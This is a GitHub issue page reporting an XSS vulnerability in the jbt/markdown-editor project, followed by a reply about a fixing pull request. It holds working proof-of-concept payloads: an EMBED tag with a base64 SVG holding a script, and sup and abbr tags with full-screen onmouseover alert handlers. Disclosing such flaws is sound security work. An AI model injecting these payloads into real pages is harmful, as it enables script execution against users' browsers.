search

jbt / markdown-editor

Live (Github-flavored) Markdown Editor
http://jbt.github.com/markdown-editor
ISC License
2.82k stars 643 forks source link

XSS vulnerability on <abbr> and <sup><EMBED> label #106

Open j1nse opened 4 years ago

j1nse commented 4 years ago

This label and attack vector will cause XSS. payload: <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIGlkPSJ4c3MiPjxzY3JpcHQgdHlwZT0idGV4dC9lY21hc2NyaXB0Ij5hbGVydCgieHNzISIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <sup style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">sup</sup> <abbr style="position:fixed;left:0;top:0;width:10000px;height:10000px;" onmouseover="alert('xss')">abbr</abbr> if you type the payload,the xss vulnerability will be triggered. xss xss2 xss3

ColeBennett commented 4 years ago

Hi @shequ123, thanks for creating an issue for this! I opened a pull request implementing changes to fix these problems and it correctly blocks those scenarios from happening in the editor. Pull request: https://github.com/jbt/markdown-editor/pull/110